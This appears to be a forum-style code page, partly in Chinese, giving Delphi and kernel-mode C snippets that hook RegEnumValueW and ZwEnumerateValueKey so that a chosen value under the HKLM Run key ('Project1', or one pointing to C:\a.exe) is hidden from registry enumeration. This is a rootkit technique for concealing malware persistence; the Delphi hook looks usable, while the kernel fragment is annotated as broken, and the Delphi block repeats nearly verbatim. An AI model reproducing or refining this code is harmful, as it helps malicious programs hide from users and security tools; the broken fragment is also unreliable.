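{ Returns the enumeration index of the value named name1 under
  HKLM\Software\Microsoft\Windows\CurrentVersion\Run, or Cardinal(-1)
  (High(DWORD)) when the key cannot be opened or no value has that name.
  The comparison is Delphi's default string comparison (case-sensitive),
  while registry value names are case-insensitive: pass name1 with the
  exact casing stored in the registry.
  Fix: a value whose name does not fit the 256-char buffer (ERROR_MORE_DATA)
  no longer terminates the scan; it is skipped and enumeration continues. }
function RegQueryValueExWindex(name1: string): DWORD;
var
  buf: array[0..255] of char;
  iRes: integer;
  hKeyx: HKEY;
  dwIndex, dwSize: DWORD;
begin
  Result := Cardinal(-1);
  if RegOpenKeyEx(HKEY_LOCAL_MACHINE,
       'Software\Microsoft\Windows\CurrentVersion\Run\', 0,
       KEY_QUERY_VALUE, hKeyx) <> ERROR_SUCCESS then
    Exit;
  try
    dwIndex := 0;
    repeat
      dwSize := 255;          { in chars; leaves room for the terminator }
      buf[0] := #0;
      iRes := RegEnumValue(hKeyx, dwIndex, buf, dwSize, nil, nil, nil, nil);
      case iRes of
        ERROR_SUCCESS:
          begin
            if buf = name1 then
              Result := dwIndex;
            Inc(dwIndex);
          end;
        ERROR_MORE_DATA:
          { Name longer than buf: its contents are unreliable, so do not
            compare; advance to the next index instead of stopping. }
          Inc(dwIndex);
      end;
      { ERROR_NO_MORE_ITEMS and any other error end the scan. }
    until (iRes <> ERROR_SUCCESS) and (iRes <> ERROR_MORE_DATA);
  finally
    RegCloseKey(hKeyx);
  end;
end;

{ Store the index of the Run value to skip in the fourth Cardinal slot of
  the memory View points to (View + 12). Cardinal(-1) means "skip nothing". }
PCardinal(Cardinal(View) + SizeOf(Cardinal) * 3)^ := RegQueryValueExWindex('Project1');

{ Replacement for RegEnumValueW. When hKey names
  \Registry\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (checked
  case-insensitively via NtQueryObject/ObjectNameInformation) and dwIndex is
  at or beyond the index stored at View + 12, dwIndex is advanced by one
  before forwarding: the caller never receives the value at the stored index
  and its enumeration ends one entry early. All other calls are forwarded
  unchanged to RegEnumValueWNext.
  NOTE(review): the stored index is captured once by RegQueryValueExWindex;
  if values are added to or removed from the Run key afterwards the wrong
  entry is skipped.
  NOTE(review): a 32-bit process on 64-bit Windows may see the Run key under
  a WOW6432Node path, which this exact-path comparison would not match -
  confirm on the target platform.
  Fix: the 4096-byte buffer is released in a try/finally so it is not leaked
  if anything between GetMem and FreeMem raises. }
function RegEnumValueWCallback(hKey: HKEY; dwIndex: DWORD; lpValueName: PWideChar;
  var lpcbValueName: DWORD; lpReserved: Pointer; lpType: PDWORD;
  lpData: PByte; lpcbData: PDWORD): Longint; stdcall;
var
  ObjectName: PWideChar;
  Length: Cardinal;
  RunName: UNICODE_STRING;
begin
  GetMem(ObjectName, 4096);
  try
    { 1 = ObjectNameInformation; the returned buffer starts with a UNICODE_STRING }
    if NtQueryObject(hKey, 1, ObjectName, 4096, @Length) = 0 then
    begin
      RunName.Buffer := '\Registry\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';
      RunName.Length := 126;          { 63 WideChars * 2 bytes, no terminator }
      RunName.MaximumLength := 126;
      if RtlCompareUnicodeString(PUNICODE_STRING(ObjectName), @RunName, True) = 0 then
        if dwIndex >= PCardinal(Cardinal(View) + SizeOf(Cardinal) * 3)^ then
          Inc(dwIndex);
    end;
  finally
    FreeMem(ObjectName);
  end;
  Result := RegEnumValueWNext(hKey, dwIndex, lpValueName, lpcbValueName,
    lpReserved, lpType, lpData, lpcbData);
end;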
核心部分（内核态片段，缺少函数头；ZHURUINAN 的参数列表与 ZwEnumerateValueKey 一致，应为保存下来的原始函数指针）
NTSTATUS ntstatus;
/* NOTE(review): fragment only - the enclosing function's signature is not
 * shown. The argument list handed to ZHURUINAN (KeyHandle, Index,
 * KeyValueInformationClass, KeyValueInformation, Length, ResultLength)
 * matches ZwEnumerateValueKey, so ZHURUINAN is presumably the saved
 * original routine and this is the replacement's body - confirm. */
NTSTATUS status=STATUS_SUCCESS;
void *sjm;
ULONG vvb=0;
ULONG asp=100;
UNICODE_STRING zxm,yy;
/* NOTE(review): the cast must be to the pointer type
 * (PKEY_VALUE_BASIC_INFORMATION); casting to the struct itself does not
 * compile. The returned pointer is never checked for NULL, and the pool
 * block is never released (ExFreePool) on any path below. */
PKEY_VALUE_BASIC_INFORMATION pvbi =(KEY_VALUE_BASIC_INFORMATION)ExAllocatePool(PagedPool,asp);
RtlInitUnicodeString(&yy,L"zhu");
/* First pass: let the original routine fill in the caller's buffer. */
ntstatus = ZHURUINAN( KeyHandle,Index,KeyValueInformationClass,KeyValueInformation, Length,ResultLength);
if( NT_SUCCESS( ntstatus ))
{
/* Class 0 is KeyValueBasicInformation. Its Name is a WCHAR array whose
 * size is NameLength (in bytes) and is not NUL-terminated. For any other
 * class sjm stays uninitialised before it is used below. */
if (KeyValueInformationClass==0)
sjm = ((KEY_VALUE_BASIC_INFORMATION)KeyValueInformation)->Name;
/* NOTE(review): '=' is assignment, not comparison, and a narrow string
 * literal is stored into a void* - the condition is always true and the
 * value name is never actually tested. Comparing against Name requires a
 * length-bounded wide comparison (e.g. build a UNICODE_STRING from
 * Name/NameLength and use RtlEqualUnicodeString). */
if (sjm="Run")
{
/* Query value "zhu" of the same key. With KeyValuePartialInformation the
 * buffer is laid out as KEY_VALUE_PARTIAL_INFORMATION (TitleIndex, Type,
 * DataLength, Data); that layout has no Name/NameLength, so the two fields
 * read through pvbi below belong to the wrong struct. asp (100 bytes) may
 * also be too small; STATUS_BUFFER_OVERFLOW / STATUS_BUFFER_TOO_SMALL are
 * not handled and vvb (the required size) is ignored. */
status=ZwQueryValueKey(KeyHandle,&yy,KeyValuePartialInformation,pvbi,asp,&vvb);
if (NT_SUCCESS(status))
{
zxm.Length = zxm.MaximumLength =pvbi->NameLength;
zxm.Buffer = pvbi->Name;
/* NOTE(review): wcsstr expects a NUL-terminated string; registry value
 * names and data are not guaranteed to be terminated, so this can read
 * past the 100-byte pool allocation. */
if(wcsstr(zxm.Buffer,L"C:\\a.exe")!=NULL)
{
/* Adding 100 moves the index far past the end of the key, so the repeated
 * call below presumably fails with STATUS_NO_MORE_ENTRIES and the caller's
 * enumeration stops here. Skipping exactly one entry would be Index+1. */
Index=Index+100;
}
}
}
/* Second pass with the (possibly shifted) index; it overwrites the result
 * of the first call in KeyValueInformation/ResultLength. */
ntstatus = ZHURUINAN(KeyHandle,Index,KeyValueInformationClass,KeyValueInformation,Length,ResultLength);
}
return ntstatus;
上面的内核态片段只是稍微参考一下，不能直接编译，需要自行修正。
D（Delphi）的 hook 例子实在太少。
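{ Body of RegQueryValueExWindex(name1: string): DWORD - the header is not
  reproduced on this page. Returns the enumeration index of the value named
  name1 under HKLM\Software\Microsoft\Windows\CurrentVersion\Run, or
  Cardinal(-1) when the key cannot be opened or no value has that name.
  The comparison is Delphi's default (case-sensitive) string comparison,
  while registry value names are case-insensitive: pass name1 with the
  exact casing stored in the registry.
  Fix: a value whose name does not fit the 256-char buffer (ERROR_MORE_DATA)
  no longer terminates the scan; it is skipped and enumeration continues. }
var
  buf: array[0..255] of char;
  iRes: integer;
  hKeyx: HKEY;
  dwIndex, dwSize: DWORD;
begin
  Result := Cardinal(-1);
  if RegOpenKeyEx(HKEY_LOCAL_MACHINE,
       'Software\Microsoft\Windows\CurrentVersion\Run\', 0,
       KEY_QUERY_VALUE, hKeyx) <> ERROR_SUCCESS then
    Exit;
  try
    dwIndex := 0;
    repeat
      dwSize := 255;          { in chars; leaves room for the terminator }
      buf[0] := #0;
      iRes := RegEnumValue(hKeyx, dwIndex, buf, dwSize, nil, nil, nil, nil);
      case iRes of
        ERROR_SUCCESS:
          begin
            if buf = name1 then
              Result := dwIndex;
            Inc(dwIndex);
          end;
        ERROR_MORE_DATA:
          { Name longer than buf: its contents are unreliable, so do not
            compare; advance to the next index instead of stopping. }
          Inc(dwIndex);
      end;
      { ERROR_NO_MORE_ITEMS and any other error end the scan. }
    until (iRes <> ERROR_SUCCESS) and (iRes <> ERROR_MORE_DATA);
  finally
    RegCloseKey(hKeyx);
  end;
end;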
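{ Store the index of the Run value to skip in the fourth Cardinal slot of
  the memory View points to (View + 12). Cardinal(-1) means "skip nothing". }
PCardinal(Cardinal(View) + SizeOf(Cardinal) * 3)^ := RegQueryValueExWindex('Project1');

{ Replacement for RegEnumValueW. When hKey names
  \Registry\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (checked
  case-insensitively via NtQueryObject/ObjectNameInformation) and dwIndex is
  at or beyond the index stored at View + 12, dwIndex is advanced by one
  before forwarding: the caller never receives the value at the stored index
  and its enumeration ends one entry early. All other calls are forwarded
  unchanged to RegEnumValueWNext.
  NOTE(review): the stored index is captured once by RegQueryValueExWindex;
  if values are added to or removed from the Run key afterwards the wrong
  entry is skipped.
  NOTE(review): a 32-bit process on 64-bit Windows may see the Run key under
  a WOW6432Node path, which this exact-path comparison would not match -
  confirm on the target platform.
  Fix: the 4096-byte buffer is released in a try/finally so it is not leaked
  if anything between GetMem and FreeMem raises. }
function RegEnumValueWCallback(hKey: HKEY; dwIndex: DWORD; lpValueName: PWideChar;
  var lpcbValueName: DWORD; lpReserved: Pointer; lpType: PDWORD;
  lpData: PByte; lpcbData: PDWORD): Longint; stdcall;
var
  ObjectName: PWideChar;
  Length: Cardinal;
  RunName: UNICODE_STRING;
begin
  GetMem(ObjectName, 4096);
  try
    { 1 = ObjectNameInformation; the returned buffer starts with a UNICODE_STRING }
    if NtQueryObject(hKey, 1, ObjectName, 4096, @Length) = 0 then
    begin
      RunName.Buffer := '\Registry\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';
      RunName.Length := 126;          { 63 WideChars * 2 bytes, no terminator }
      RunName.MaximumLength := 126;
      if RtlCompareUnicodeString(PUNICODE_STRING(ObjectName), @RunName, True) = 0 then
        if dwIndex >= PCardinal(Cardinal(View) + SizeOf(Cardinal) * 3)^ then
          Inc(dwIndex);
    end;
  finally
    FreeMem(ObjectName);
  end;
  Result := RegEnumValueWNext(hKey, dwIndex, lpValueName, lpcbValueName,
    lpReserved, lpType, lpData, lpcbData);
end;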